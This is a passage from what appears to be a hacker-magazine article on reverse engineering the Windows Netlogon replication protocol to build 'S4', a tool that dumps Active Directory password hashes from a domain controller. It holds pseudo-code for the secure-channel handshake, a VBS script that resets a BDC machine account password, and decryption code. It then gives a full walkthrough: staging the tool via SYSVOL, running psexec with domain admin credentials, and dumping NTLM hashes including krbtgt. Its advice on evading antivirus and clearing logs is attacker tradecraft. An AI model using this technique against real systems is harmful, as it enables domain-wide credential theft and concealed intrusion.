0x00000002 Indicates the LSA database.
|
|
---------------------------------------------------------------------------
|
|
|
|
Assuming an attacker could call NetrDatabaseSync2() with DatabaseID=0 from
|
|
an (emulated) BDC (= a compromised DC), then he would likely be able to
|
|
retrieve the user database (SAM), which should include hashed passwords as
|
|
well, right?
|
|
|
|
I was very suspicious at first because the documentation wasn't mentioning
|
|
anything about the LSA queries and lsa_QueryInfoPolicy2() is still
|
|
currently undocumented (afaik). I was afraid that this would complicate
|
|
things. I could have started to dig inside Samba 4's code (which is quite
|
|
messy unfortunately) but I had instead a much better idea. What if this API
|
|
was implemented in some native program available with Windows Server?
|
|
|
|
Guess the answer.
|
|
|
|
|
|
---[ 4 - Digging into the Netlogon replication mechanism
|
|
|
|
|
|
If you're familiar with Windows sysadmin stuff then you must be well aware
|
|
of the "Remote Server Administration Tools" [07] which provides a set of
|
|
useful new commands for the CLI, including the one I was looking for:
|
|
nltest.exe (now native under Windows 2008 FYI).
|
|
|
|
Here is how Microsoft describes the tool:
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
You can use nltest to:
|
|
|
|
Get a list of domain controllers
|
|
|
|
Force a remote shutdown
|
|
|
|
Query the status of trust
|
|
|
|
Test trust relationships and the state of domain controller replication
|
|
in a Windows domain
|
|
|
|
Force a user-account database to synchronize on Windows NT version 4.0
|
|
or earlier domain controllers <-- synchronize + NT4 == JACKPOT?
|
|
---------------------------------------------------------------------------
|
|
|
|
The last sentence is interesting, right?
|
|
|
|
Looking at the IAT of nltest.exe (for Windows 2003), I saw that there were
|
|
entries for I_NetServerReqChallenge(), I_NetServerAuthenticate() and
|
|
I_NetDatabaseSync(), all of them being imported from NETAPI32.dll and
|
|
(strangely) undocumented.
|
|
|
|
A short look at them convinced me that they were mere wrappers for RPC
|
|
calls to (respectively) NetrServerReqChallenge(), NetrServerAuthenticate()
|
|
and NetrDatabaseSync() located in netlogon.dll and obviously called using a
|
|
binding to the named pipe \\%COMPUTERNAME%\IPC$\netlogon. What's cool with
|
|
these functions is that they _are_ documented in [08] and a tiny
|
|
modification apart, their prototypes match those of their NETAPI32.dll
|
|
cousins.
|
|
|
|
To make things even easier, I observed that all our targeted functions were
|
|
called inside one big function, arbitrarily called SyncFunction() from now
|
|
on. Reversing SyncFunction() was a task which proved to be really easy
|
|
thanks to Microsoft's API documentation.
|
|
|
|
Assuming DC2 requests a synchronization from its PDC (DC1), this gives the
|
|
approximate pseudo-code (I omitted details about the assembly for
|
|
clarification purposes, but you can find them in the uuencoded C code at
|
|
the end of the article):
|
|
|
|
-----------------------------[ SyncFunction() ]----------------------------
|
|
|
|
# Step 1:
|
|
# ClientChallenge is an 8 bytes array randomly chosen
|
|
|
|
RANDOM(ClientChallenge);
|
|
|
|
# Step 2:
|
|
# DC2 sends its challenge and requests one (also an 8 bytes array)
|
|
# from DC1
|
|
|
|
ZERO(ServerChallenge);
|
|
I_NetReqChallengeFunc(
|
|
(WCHAR) L"\\\\" + DC1_FQDN,
|
|
(WCHAR) DC2_HOSTNAME,
|
|
ClientChallenge,
|
|
[OUT] ServerChallenge);
|
|
|
|
# Step 3:
|
|
# The client creates a Unicode object out of its machine account name
|
|
# (suffix is '$') and hashes it using SystemFunction007() which is an
|
|
# MD4()
|
|
# The resulting hash (NTLM) is an 8 bytes array: MD4_HASH
|
|
|
|
UnicodeString(ComputerName, "DC2$")
|
|
ZERO(MD4_HASH);
|
|
SystemFunction007((UnicodeString)ComputerName, MD4_HASH);
|
|
|
|
# Step 4:
|
|
# To authenticate itself, the client will need to compute a new
|
|
# challenge (NewClientChallenge).
|
|
# To do so, the client builds a DES key (SessionKey) using the two
|
|
# challenges and the previously computed hash.
|
|
|
|
ZERO(SessionKey, 16);
|
|
NlMakeSessionKey(
|
|
MD4_HASH,
|
|
ClientChallenge,
|
|
ServerChallenge,
|
|
[OUT] SessionKey);
|
|
|
|
# Step 5:
|
|
# The client computes NewClientChallenge using SessionKey.
|
|
|
|
Encrypt000(
|
|
ClientChallenge,
|
|
[OUT] NewClientChallenge,
|
|
SessionKey);
|
|
|
|
# Step 6:
|
|
# The client sends NewClientChallenge to authenticate itself.
|
|
# If the answer is the correct one, the server will acknowledge
|
|
# the identity of the client and gives him back his own challenge
|
|
# (NewServerChallenge)
|
|
|
|
ZERO(NewServerChallenge);
|
|
I_NetServerAuthenticate(
|
|
(WCHAR) L"\\\\" + DC1_FQDN,
|
|
L"DC2$", # DC2's machine account name
|
|
ServerSecureChannel = 6,
|
|
(WCHAR) L"DC2", # DC2's hostname
|
|
NewClientChallenge,
|
|
[OUT] NewServerChallenge,
|
|
NegotiateFlags);
|
|
|
|
# Step 7:
|
|
# The client needs to know that he can trust the server so the
|
|
# authentication has to be _mutual_. Imagine if a rogue DC was sending
|
|
# a false SAM, this would allow an attacker to authenticate himself on
|
|
# DC2 using spoofed credentials.
|
|
#
|
|
# To check the identity of the server, NewServerChallenge must have
|
|
# been calculated using ServerChallenge and SessionKey which is common
|
|
# to DC1 and DC2.
|
|
|
|
Encrypt000(
|
|
ServerChallenge,
|
|
[OUT] ExpectedKey,
|
|
SessionKey);
|
|
|
|
if( NewServerChallenge != ExpectedKey )
|
|
{
|
|
exit(1);
|
|
}
|
|
|
|
# Step 8:
|
|
# For each type of database (DatabaseID), DC2 computes a new challenge
|
|
# which is stored in Authenticator and retrieves the database object
|
|
# DeltaArray. After each call, the client checks the authenticity of
|
|
# the data returned.
|
|
|
|
for(DatabaseID=0; DatabaseID<3; DatabaseID++)
|
|
{
|
|
NlBuildAuthenticator(
|
|
NewClientChallenge,
|
|
SessionKey,
|
|
[OUT] Authenticator);
|
|
|
|
ZERO(ReturnAuthenticator);
|
|
I_NetDatabaseSync(
|
|
(WCHAR) L"\\\\" + DC1_FQDN,
|
|
(WCHAR) DC2_HOSTNAME,
|
|
Authenticator,
|
|
ReturnAuthenticator,
|
|
DatabaseID,
|
|
SyncContext=0,
|
|
[OUT] DeltaArray,
|
|
-1);
|
|
|
|
if( NlUpdateSeed(
|
|
NewClientChallenge,
|
|
ReturnAuthenticator,
|
|
SessionKey) == 0 )
|
|
{
|
|
exit(1);
|
|
}
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
With the additional functions:
|
|
|
|
-----------------------------[ subfunctions ]------------------------------
|
|
|
|
# This function uses the 14 first bytes of SessionKey to compute
|
|
# a new challenge out of an old one. Both challenges are 8 bytes
|
|
# arrays.
|
|
#
|
|
# new = DES(DES(old))
|
|
|
|
|
|
Encrypt000(
|
|
ClientChallenge,
|
|
NewChallenge,
|
|
SessionKey)
|
|
{
|
|
BYTE TempOutput[8];
|
|
|
|
ZERO(NewChallenge);
|
|
SystemFunction001(ClientChallenge, SessionKey[0..6], TempOutput);
|
|
SystemFunction001(TempOutput, SessionKey[7..13], NewChallenge);
|
|
|
|
# TempOutput = DES(in=ClientChallenge, k=SessionKey[0..6])
|
|
# NewChallenge = DES(in=TempOutput, k=SessionKey[7..13])
|
|
}
|
|
|
|
---
|
|
|
|
# The SessionKey is calculated using a combination of ClientChallenge
|
|
# and ServerChallenge (to avoid replay attacks I believe).
|
|
# Because client & server both know the MD4 value (a shared key between
|
|
# them), they both can compute safely the SessionKey, but an attacker
|
|
# without this knowledge will be unable to.
|
|
|
|
NlMakeSessionKey(
|
|
MD4,
|
|
ClientChallenge,
|
|
ServerChallenge,
|
|
SessionKey)
|
|
{
|
|
BYTE TempOut[8];
|
|
|
|
ZERO(SessionKey)
|
|
SessionKey[0..3] = ClientChallenge[0..3] + ServerChallenge[0..3];
|
|
SessionKey[4..7] = ClientChallenge[4..7] + ServerChallenge[4..7];
|
|
|
|
SystemFunction001(SessionKey[0..7], MD4[0..6], TempOut);
|
|
SystemFunction001(TempOut, MD4[9..15], SessionKey);
|
|
|
|
# TempOut = DES(SessionKey[0..7], MD4[0..6])
|
|
# SessionKey = DES(TempOut, MD4[9..15])
|
|
}
|
|
|
|
---
|
|
|
|
# This function builds the Authenticator necessary for each
|
|
# *DatabaseSync() call. The authenticator includes a Timestamp which is
|
|
# used in the computation of the new Challenge.
|
|
|
|
NlBuildAuthenticator(
|
|
NewClientChallenge,
|
|
SessionKey,
|
|
Authenticator
|
|
)
|
|
{
|
|
FILETIME Time;
|
|
ZERO(Authenticator);
|
|
GetSystemTimeAsFileTime(Time);
|
|
RtlTimeToSecondsSince1970(
|
|
Time,
|
|
Authenticator->Timestamp);
|
|
NewClientChallenge[0..3] += Authenticator->Timestamp;
|
|
Encrypt000(
|
|
NewClientChallenge,
|
|
Authenticator->Credential,
|
|
SessionKey);
|
|
}
|
|
|
|
---
|
|
|
|
# The server is supposed to acknowledge securely the request.
|
|
# This function checks that the acknowledgment is indeed from
|
|
# the server and not from some rogue DC.
|
|
|
|
NlUpdateSeed(
|
|
NewClientChallenge,
|
|
ReturnAuthenticator,
|
|
SessionKey
|
|
)
|
|
{
|
|
BYTE TempOut[8];
|
|
|
|
NewClientChallenge[0]++;
|
|
Encrypt000(
|
|
NewClientChallenge,
|
|
TempOut,
|
|
SessionKey);
|
|
|
|
if( ReturnAuthenticator->Credential == TempOut )
|
|
return 1;
|
|
|
|
return 0;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
Let's put aside the usual Microsoft crypto weirdness of the protocol
|
|
because this is not the subject of this article. In a nutshell:
|
|
|
|
- The client (BDC) and the server (PDC) both compute a session key
|
|
using random challenges (to avoid replay attacks) and a 'secret' MD4
|
|
key.
|
|
- Once a trusted bond between them is established, the server sends
|
|
several objects (of type DeltaArray) which should contain the
|
|
expected secrets. The trusted bond is called a 'secure channel' in
|
|
Microsoft's documentation.
|
|
- To avoid man-in-middle attempts, the exchanges are somehow
|
|
authenticated using the session key (which has another purpose, but
|
|
that's another story my friends).
|
|
|
|
Now, if you have been attentive you may have realized that I never
|
|
mentioned any LSA related functions (remember lsarpc bind?) and that the
|
|
session key would be really easy to deduce for a passive observer (sniffer)
|
|
because the shared secret (%BDC_NAME% + "$") is predictable. And indeed, it
|
|
didn't work when I first tested the code built upon the reverse engineering
|
|
process. I_NetServerAuthenticate() kicked me out with the classical "Access
|
|
Denied" message.
|
|
|
|
So what went wrong? I was almost sure that the lsa_() functions were not
|
|
necessary because they are not used in nltest.exe. So this led me to think
|
|
that somehow NewClientChallenge wasn't correct. Assuming the algorithm was
|
|
well reversed, the session key produced by NlMakeSessionKey() had to be
|
|
erroneous. Strange? Not quite. Remember that the MD4 key is somehow weird.
|
|
Even considering Microsoft's past, it was hard to believe that they would
|
|
base the security of their protocol on such a value. And indeed they aren't
|
|
that crazy! Using the appropriate hook in LSASS, I found out that this MD4
|
|
was in fact the client's computer account hash (NTLM)! A result that I
|
|
would later find almost everywhere whenever looking for some information on
|
|
the so-called 'secure channel'. Sometimes you just have to keep looking...
|
|
|
|
The problem is that retrieving the BDC's computer account NTLM is
|
|
(probably) as hard as retrieving the whole SAM itself. So how do we deal
|
|
with the Ouroboros? The solution is actually quite simple: we may not know
|
|
the NTLM hash, but we can easily change it! Look at this nice piece of
|
|
code:
|
|
|
|
-------------------------------[ passwd.vbs ]------------------------------
|
|
Dim objComputer
|
|
|
|
Set objComputer = GetObject("WinNT://foo.bar/DC2$")
|
|
objComputer.SetPassword "dummy"
|
|
|
|
Wscript.Quit
|
|
---------------------------------------------------------------------------
|
|
|
|
Executing the VBS script on the 'BDC' is enough (remember that we own a
|
|
domain administrator account). The cool thing with this trick is that the
|
|
BDC will then synchronize its password with the 'PDC' for us. Cool trick
|
|
right? And this proved to be enough to have I_NetDatabaseSync()
|
|
successfully returning. In the tool that I wrote, I implemented it using
|
|
the IADsUser::SetPassword() method.
|
|
|
|
>>>>>>>>>>>>>>>>>>
|
|
I was lucky with the nltest.exe analysis because I didn't use the Windows
|
|
2008 version. On Windows 2008 server, I_NetDatabaseSync() isn't used so it
|
|
would have forced me to reverse engineer Samba's C code which is far more
|
|
difficult believe me :-P
|
|
<<<<<<<<<<<<<<<<<<
|
|
|
|
|
|
---[ 5 - Extracting the secrets
|
|
|
|
|
|
Now that this part of the job is finished, we only need to know how to
|
|
parse the DeltaArray objects, something partially documented by Microsoft
|
|
[09]. nltext.exe doesn't perform this task (it only tests that the
|
|
synchronization is working and frees the DeltaArray objects that it
|
|
receives) but obviously samba-tool does.
|
|
|
|
|
|
-----[ 5.1 - Browsing samba-tool's source code
|
|
|
|
|
|
Everything starts in source4/samba_tool/samba_tool.c:
|
|
|
|
1. main() calls binary_net(), the main function
|
|
2. binary_net() then:
|
|
|
|
- Initializes the Python interpreter using Py_Initialize()
|
|
|
|
- Creates a dictionary out of the "samba.netcmd" module using
|
|
py_commands() which returns the Python object "commands". This
|
|
object is created in:
|
|
source4/scripting/python/samba/netcmd/__init__.py:
|
|
|
|
-------------------------------------------------------
|
|
commands = {}
|
|
from samba.netcmd.pwsettings import cmd_pwsettings
|
|
commands["pwsettings"] = cmd_pwsettings()
|
|
from samba.netcmd.domainlevel import cmd_domainlevel
|
|
commands["domainlevel"] = cmd_domainlevel()
|
|
from samba.netcmd.setpassword import cmd_setpassword
|
|
commands["setpassword"] = cmd_setpassword()
|
|
from samba.netcmd.newuser import cmd_newuser
|
|
commands["newuser"] = cmd_newuser()
|
|
from samba.netcmd.netacl import cmd_acl
|
|
[...]
|
|
-------------------------------------------------------
|
|
|
|
3. There are 3 possible situations:
|
|
|
|
- If argv[1] is handled by a Python module then commands[argv[1]]
|
|
is not void and the corresponding method is called.
|
|
|
|
- Else if argv[1] is in net_functable[] then a C function is
|
|
handling the command.
|
|
|
|
- Else argv[1] is not a legitimate command => error msg!
|
|
|
|
In the case of 'samdump', it is implemented in the C language by the
|
|
net_samdump() function available in source4/samba_tool/vampire.c. This
|
|
function calls libnet_SamSync_netlogon() (source4/libnet/libnet_samsync.c)
|
|
which:
|
|
|
|
- Establishes the secure channel
|
|
- Calls dcerpc_netr_DatabaseSync_r() 3 times (1 per DatabaseID value)
|
|
- Calls samsync_fix_delta() in (libcli/samsync/decrypt.c) which handles
|
|
the decryption (if required). Remember this function.
|
|
|
|
|
|
-----[ 5.2 - Understanding database changes
|
|
|
|
|
|
I_NetDatabaseSync() returns DeltaArray which is a NETLOGON_DELTA_ENUM_ARRAY
|
|
object. It's very well documented by Microsoft:
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
// http://msdn.microsoft.com/en-us/library/cc237083%28v=prot.13%29.aspx
|
|
typedef struct _NETLOGON_DELTA_ENUM_ARRAY {
|
|
DWORD CountReturned;
|
|
[size_is(CountReturned)] PNETLOGON_DELTA_ENUM Deltas;
|
|
} NETLOGON_DELTA_ENUM_ARRAY,
|
|
*PNETLOGON_DELTA_ENUM_ARRAY;
|
|
|
|
// http://msdn.microsoft.com/en-us/library/cc237082%28v=prot.13%29.aspx
|
|
typedef struct _NETLOGON_DELTA_ENUM {
|
|
NETLOGON_DELTA_TYPE DeltaType;
|
|
[switch_is(DeltaType)] NETLOGON_DELTA_ID_UNION DeltaID;
|
|
[switch_is(DeltaType)] NETLOGON_DELTA_UNION DeltaUnion;
|
|
} NETLOGON_DELTA_ENUM,
|
|
*PNETLOGON_DELTA_ENUM;
|
|
---------------------------------------------------------------------------
|
|
|
|
So basically DeltaArray is an array of NETLOGON_DELTA_ENUM objects.
|
|
Depending on their DeltaType field, the receiver will know how to parse
|
|
their internal fields (DeltaID and DeltaUnion). According to Microsoft,
|
|
DeltaType may take the following values:
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
// http://msdn.microsoft.com/en-us/library/cc237100%28v=prot.13%29.aspx
|
|
The NETLOGON_DELTA_TYPE enumeration defines an enumerated set of possible
|
|
database changes.
|
|
|
|
typedef enum _NETLOGON_DELTA_TYPE
|
|
{
|
|
AddOrChangeDomain = 1,
|
|
AddOrChangeGroup = 2,
|
|
DeleteGroup = 3,
|
|
RenameGroup = 4,
|
|
AddOrChangeUser = 5,
|
|
DeleteUser = 6,
|
|
RenameUser = 7,
|
|
ChangeGroupMembership = 8,
|
|
AddOrChangeAlias = 9,
|
|
DeleteAlias = 10,
|
|
RenameAlias = 11,
|
|
ChangeAliasMembership = 12,
|
|
AddOrChangeLsaPolicy = 13,
|
|
AddOrChangeLsaTDomain = 14,
|
|
DeleteLsaTDomain = 15,
|
|
AddOrChangeLsaAccount = 16,
|
|
DeleteLsaAccount = 17,
|
|
AddOrChangeLsaSecret = 18,
|
|
DeleteLsaSecret = 20,
|
|
DeleteGroupByName = 20,
|
|
DeleteUserByName = 21,
|
|
SerialNumberSkip = 22
|
|
} NETLOGON_DELTA_TYPE;
|
|
---------------------------------------------------------------------------
|
|
|
|
When dcerpc_netr_DatabaseSync_r() returns, samsync_fix_delta() is called
|
|
for each NETLOGON_DELTA_ENUM object. The source code of this function is
|
|
straightforward (libcli/samsync/decrypt.c):
|
|
|
|
--------------------------[ Samba 4 source code ]--------------------------
|
|
NTSTATUS samsync_fix_delta(TALLOC_CTX *mem_ctx,
|
|
struct netlogon_creds_CredentialState *creds,
|
|
enum netr_SamDatabaseID database_id,
|
|
struct netr_DELTA_ENUM *delta)
|
|
{
|
|
NTSTATUS status = NT_STATUS_OK;
|
|
|
|
switch (delta->delta_type) {
|
|
case NETR_DELTA_USER:
|
|
|
|
status = fix_user(mem_ctx,
|
|
creds,
|
|
database_id,
|
|
delta);
|
|
break;
|
|
case NETR_DELTA_SECRET:
|
|
|
|
status = fix_secret(mem_ctx,
|
|
creds,
|
|
database_id,
|
|
delta);
|
|
break;
|
|
default:
|
|
break;
|
|
}
|
|
|
|
return status;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
So to summarize, amongst all the NETLOGON_DELTA_ENUM that
|
|
I_NetDatabaseSync() provides us, the only important ones are those of type
|
|
AddOrChangeUser (NETR_DELTA_USER) and AddOrChangeLsaSecret
|
|
(NETR_DELTA_SECRET).
|
|
|
|
|
|
-----[ 5.3 - Retrieving the hashes
|
|
|
|
|
|
Because the subject of this paper is pwdump-like tools, we will only focus
|
|
our attention on the AddOrChangeUser type. Here is the code that I used to
|
|
extract the useful objects:
|
|
|
|
----------------------------[ S4 source code ]-----------------------------
|
|
PNETLOGON_DELTA_ENUM Deltas = DeltaArray->Deltas;
|
|
for(i=0; i<DeltaArray->CountReturned; i++)
|
|
{
|
|
|
|
#ifdef __debug__
|
|
if(Deltas->DeltaType == AddOrChangeLsaSecret)
|
|
{
|
|
[...]
|
|
}
|
|
#endif
|
|
|
|
if(Deltas->DeltaType == AddOrChangeUser)
|
|
{
|
|
PNETLOGON_DELTA_USER DUser;
|
|
DUser = (PNETLOGON_DELTA_USER)
|
|
Deltas->DeltaUnion.DeltaUser;
|
|
|
|
arcfour_crypt_blob(
|
|
DUser->PrivateData.Data,
|
|
DUser->PrivateData.DataLength,
|
|
SessionKey,
|
|
16);
|
|
[...]
|
|
}
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
The NETLOGON_DELTA_USER object holds information about a particular User
|
|
of the domain including its Username and (hashed) password. However
|
|
depending on the value of NtPasswordPresent and LmPasswordPresent, the
|
|
password may not be available in the EncryptedNtOwfPassword and
|
|
EncryptedLmOwfPassword fields of the structure. In this case, they are
|
|
stored instead in the PrivateData.Data buffer which is RC4 encrypted
|
|
using the SessionKey. Practically speaking, this last case is the only one
|
|
I've ever witnessed.
|
|
|
|
The PrivateData.Data buffer holds a copy of the information returned by
|
|
SamIGetPrivateData() which is a function called by pwdump6. The current
|
|
(and potentially former) hashed passwords are stored somehow in this buffer
|
|
and ripping the appropriate functions in the pwdump6 tool grants us the
|
|
Holy Grail. There is no need to explain what is already common knowledge in
|
|
the windows hacking world. Have a look at the DealWithDeltaArray()
|
|
function in my code if you have any questions.
|
|
|
|
|
|
---[ 6 - A practical introduction to S4 (Stealth & Secure Secret Stealer)
|
|
|
|
|
|
All this work ultimately resulted in a single tool: S4 (courtesy of the
|
|
grateful p1ckp0ck3t to the Samba team ;]). I've chosen to release it under
|
|
the GPL because I certainly disliked the idea of the pigs from MSF
|
|
including it in their framework. That said, "let the hacking begin".
|
|
|
|
Context
|
|
+++++++
|
|
|
|
We have a CMD shell on some XP/Seven box part of the 'foo.bar' 2003 domain.
|
|
Somehow we also got our hands on the credentials of a domain administrator:
|
|
"Administrator / foo123"
|
|
|
|
Our goal is simple; we now want to extract the passwords from the AD.
|
|
|
|
Locating the PDC
|
|
++++++++++++++++
|
|
|
|
Retrieving the location of the DC is as easy as performing a DNS request on
|
|
the domain name (foo.bar). However the problems with this approach are
|
|
that:
|
|
- it gives DNS servers as well,
|
|
- it doesn't allow us to locate the PDC amongst the DCs.
|
|
|
|
Fortunately, the dsquery tool is providing the information:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\Users\Administrator>dsquery server -hasfsmo PDC
|
|
"CN=DC3,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=
|
|
foo,DC=bar"
|
|
|
|
C:\Users\Administrator>
|
|
---------------------------------------------------------------------------
|
|
|
|
Now if for some reason this command isn't available, you can use the -D
|
|
option of S4 which is based on DsGetDomainControllerInfo().
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\Users\Administrator>S4.exe -D -d foo.bar
|
|
[> Discovery mode
|
|
- DC controller 0 is DC3.foo.bar [PDC]
|
|
- DC controller 1 is DC4.foo.bar
|
|
|
|
C:\Users\Administrator>
|
|
---------------------------------------------------------------------------
|
|
|
|
At this point, we know that DC3 is the PDC and DC4 (the only remaining DC)
|
|
is de facto a BDC. S4.exe will thus be executed from DC4, targeting DC3.
|
|
|
|
Uploading S4
|
|
++++++++++++
|
|
|
|
To run S4 on DC4, you first have to upload it. \\%DCNAME%\SYSVOL is
|
|
convenient for this purpose. To drop a file in this directory, you will use
|
|
the Domain Administrator account:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
c:\S4>hostname
|
|
WINXP
|
|
C:\S4>net use P: \\DC4\SYSVOL
|
|
Enter the user name for 'DC4': administrator
|
|
Enter the password for DC4:
|
|
The command completed successfully.
|
|
|
|
C:\S4>copy S4.exe P:\randomname.exe
|
|
1 file(s) copied.
|
|
|
|
C:\S4>net use P: /DELETE
|
|
P: was deleted successfully
|
|
---------------------------------------------------------------------------
|
|
|
|
Checking the state of the replication
|
|
+++++++++++++++++++++++++++++++++++++
|
|
|
|
It's always good to have an idea of how healthy the replication is on this
|
|
Active Directory because we will interfere deeply. I've never tested the
|
|
technique in an environment prone to replication troubles so I would
|
|
recommend you to be careful.
|
|
|
|
First log into the BDC using psexec (or your own tool). Then use repadmin
|
|
which will most likely be installed on the box (if not even native) as it
|
|
will give you the details of last operations:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\S4>.\Tools\PsTools\psexec.exe \\DC4 -u FOO\administrator cmd.exe
|
|
|
|
PsExec v1.94 - Execute processes remotely
|
|
Copyright (C) 2001-2008 Mark Russinovich
|
|
Sysinternals - www.sysinternals.com
|
|
|
|
Password: ****** <-- foo123
|
|
|
|
Microsoft Windows [Version 5.2.3790]
|
|
(C) Copyright 1985-2003 Microsoft Corp.
|
|
|
|
C:\WINDOWS\system32>repadmin /showrepl *
|
|
|
|
repadmin running command /showrepl against server dc3.foo.bar
|
|
|
|
Default-First-Site-Name\DC3
|
|
DC Options: IS_GC
|
|
Site Options: (none)
|
|
DC object GUID: 265b7dba-578b-47f1-91ca-78b3019e937d
|
|
DC invocationID: 265b7dba-578b-47f1-91ca-78b3019e937d
|
|
|
|
==== INBOUND NEIGHBORS ======================================
|
|
|
|
DC=foo,DC=bar
|
|
Default-First-Site-Name\DC4 via RPC
|
|
DC object GUID: 5e66dd87-69a1-485e-8e4e-172def165b06
|
|
Last attempt @ 2012-03-21 00:32:47 was successful.
|
|
|
|
[...]
|
|
|
|
repadmin running command /showrepl against server dc4.foo.bar
|
|
|
|
Default-First-Site-Name\DC4
|
|
DC Options: (none)
|
|
Site Options: (none)
|
|
DC object GUID: 5e66dd87-69a1-485e-8e4e-172def165b06
|
|
DC invocationID: be4bbd07-2a84-4c73-a00c-8260999ea3f8
|
|
|
|
==== INBOUND NEIGHBORS ======================================
|
|
|
|
DC=foo,DC=bar
|
|
Default-First-Site-Name\DC3 via RPC
|
|
DC object GUID: 265b7dba-578b-47f1-91ca-78b3019e937d
|
|
Last attempt @ 2012-03-21 00:46:37 was successful.
|
|
|
|
[...]
|
|
C:\WINDOWS\system32>
|
|
---------------------------------------------------------------------------
|
|
|
|
This AD is healthy because there is no problem reported. BTW one little
|
|
advice: avoid using your beloved MSF as a psexec-like tool because it has a
|
|
good chance to be detected by an AV.
|
|
|
|
Running S4 on the BDC
|
|
+++++++++++++++++++++
|
|
|
|
At this point, the only remaining thing to do is to run S4.exe!
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>\\DC4\SYSVOL\randomname.exe
|
|
[!!] 3 arguments are required!
|
|
|
|
\\Vboxsvr\vmware\S4.exe -p PDC_NAME -b BDC_NAME -d DOMAIN [-P password]
|
|
|
|
OR
|
|
|
|
\\Vboxsvr\vmware\S4.exe -D -d DOMAIN
|
|
|
|
C:\WINDOWS\system32>\\DC4\SYSVOL\randomname.exe -p DC3 -b DC4 -d foo.bar
|
|
Administrator:500:6F6D84B5C1DDCB7AAAD3B435B51404EE:
|
|
23DBA86EAA18933844864F24A54EBFBF:::
|
|
Guest:501:B3CC5A77A68F6477612A53E12DFC183B:
|
|
B3CC5A77A68F6477612A53E12DFC183B:::
|
|
krbtgt:502:7396CE194FA9157E5993429157021505:
|
|
3803F74802050CE62B047668F303B453:::
|
|
SUPPORT_388945a0:1001:8FCA67CF5A9FEB7DB06FDACBE2EFDEAB:
|
|
5D798B0AB3CCC22FCD7D333D06E2D785:::
|
|
DC3$:1003:C6DD50758AC2B23B9C63DFB8BC64840C:
|
|
820B5403DF3484530F644090C564E342:::
|
|
DC3$_history_0:1003:C6DD50758AC2B23B9C63DFB8BC64840C:
|
|
9CDEE73ADFA23ED3FEC2CC575EF9D0A7:::
|
|
DC4$:1108:8C6AC94AD2F708E2AAD3B435B51404EE:
|
|
F77ACB17249932BA36990D85D0F7E01A:::
|
|
DC4$_history_0:1108:CA1CDCD62E2662912950352F77B2EC2C:
|
|
5E54C47654328C3C7B541A81D6319837:::
|
|
DC4$_history_1:1108:C233128D17B4A8C47838115D84C67E42:
|
|
F77ACB17249932BA36990D85D0F7E01A:::
|
|
---------------------------------------------------------------------------
|
|
|
|
For compatibility purposes, I kept the format used by pwdump-like tools :]
|
|
Just a little test to be sure that the results are not fucked. Fire a
|
|
Python shell and compute the hash of the Administrator:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
>>> import hashlib,binascii
|
|
>>> hash = hashlib.new('md4', "foo123".encode('utf-16le')).digest()
|
|
>>> print binascii.hexlify(hash).upper()
|
|
23DBA86EAA18933844864F24A54EBFBF
|
|
>>>
|
|
---------------------------------------------------------------------------
|
|
|
|
And that's exactly the NTLM of the Administrator \o/
|
|
|
|
Fixing the mess
|
|
+++++++++++++++
|
|
|
|
Now be careful with what I'm about to say because it's *very* important.
|
|
Changing a BDC's machine account password using IADsUser::SetPassword()
|
|
breaks somehow the secure channel between the BDC and the PDC. Breaking the
|
|
secure channel means basically breaking the trust between DCs ultimately
|
|
resulting in a DoS (errors in logs, no more synchronization, ...). Oops :]
|
|
|
|
This can easily be seen by typing the command:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>nltest /SC_CHANGE_PWD:foo.bar
|
|
I_NetLogonControl failed: Status = 5 0x5 ERROR_ACCESS_DENIED
|
|
---------------------------------------------------------------------------
|
|
|
|
The same command would *not* have failed on DC3 (or on DC4 before changing
|
|
the password). Fortunately, using the Administrator's credentials, you can
|
|
use the *very* useful netdom tool [13] to fix this problem:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>netdom RESETPWD /Server:DC3 /UserD:Administrator
|
|
/PasswordD:*
|
|
Type the password associated with the domain user:
|
|
|
|
The machine account password for the local machine has been successfully
|
|
reset.
|
|
|
|
The command completed successfully.
|
|
|
|
C:\WINDOWS\system32>netdom RESET DC4
|
|
The secure channel from DC4 to the domain FOO has been reset. The
|
|
connection is with the machine \\DC3.FOO.BAR.
|
|
|
|
The command completed successfully.
|
|
---------------------------------------------------------------------------
|
|
|
|
Just to prove you that the situation is indeed fixed:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>nltest /SC_CHANGE_PWD:foo.bar
|
|
nltest /SC_CHANGE_PWD:foo.bar
|
|
Flags: 0
|
|
Connection Status = 0 0x0 NERR_Success
|
|
The command completed successfully
|
|
---------------------------------------------------------------------------
|
|
|
|
We're safe! Clean the logs and leave the box :]
|
|
|
|
|
|
---[ 7 - S4 .VS. Windows 2008 Domain Controllers
|
|
|
|
|
|
While the technique implemented in S4 is very effective if the PDC is a
|
|
Windows 2003 server, it totally fails if it's a Windows 2008 (or higher)
|
|
server and this unfortunately holds even if the Domain's functional level
|
|
is "Windows Server 2003".
|
|
|
|
The first problem that I encountered was that while I was still able to
|
|
have the new machine account's NTLM propagated, the establishment of the
|
|
secure channel always failed, an "access denied" being returned by
|
|
NetrServerAuthenticate2(). Because I suspected some evolution in the
|
|
protocol, I began to look for information on Netlogon, only to discover
|
|
that Microsoft had already published its specification [10]. My bad! If I
|
|
had been more careful I would have saved time as there was no real need to
|
|
reverse nltest.exe :] Reading the specifications, I discovered something
|
|
really interesting that I had failed to notice through the reversing
|
|
process; there are different algorithms to compute the session key.
|
|
|
|
Long story short, when a client initiates a connection to the server, it
|
|
first provides its capabilities using the NegotiateFlags parameter of
|
|
